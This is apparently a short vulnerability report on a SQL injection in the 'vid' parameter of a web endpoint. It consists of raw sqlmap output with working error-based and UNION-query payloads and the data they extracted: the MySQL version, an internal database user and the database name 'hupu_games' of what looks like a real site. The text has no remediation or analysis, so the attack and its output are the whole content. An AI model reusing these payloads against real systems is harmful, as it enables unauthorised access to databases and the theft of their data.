参数vid存在sql注入 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: vid Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: client=53c0f8caca13ebe26b0f7d6d96efb818f9ab01a9&num=20&vid=0 AND (SELECT 1083 FROM(SELE CT COUNT(*),CONCAT(0x3a7873703a,(SELECT (CASE WHEN (1083=1083) THEN 1 ELSE 0 END)),0x3a6666663a,FLOO R(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: client=53c0f8caca13ebe26b0f7d6d96efb818f9ab01a9&num=20&vid=0 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a7873703a,0x51526346476c56476766,0x3a6666663a),NULL,NULL,NULL,NULL# --- [17:14:00] [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL 5.0 [17:14:00] [INFO] fetching current user current user: 'mobile@192.168.1.%' [17:14:01] [INFO] fetching current database current database: 'hupu_games'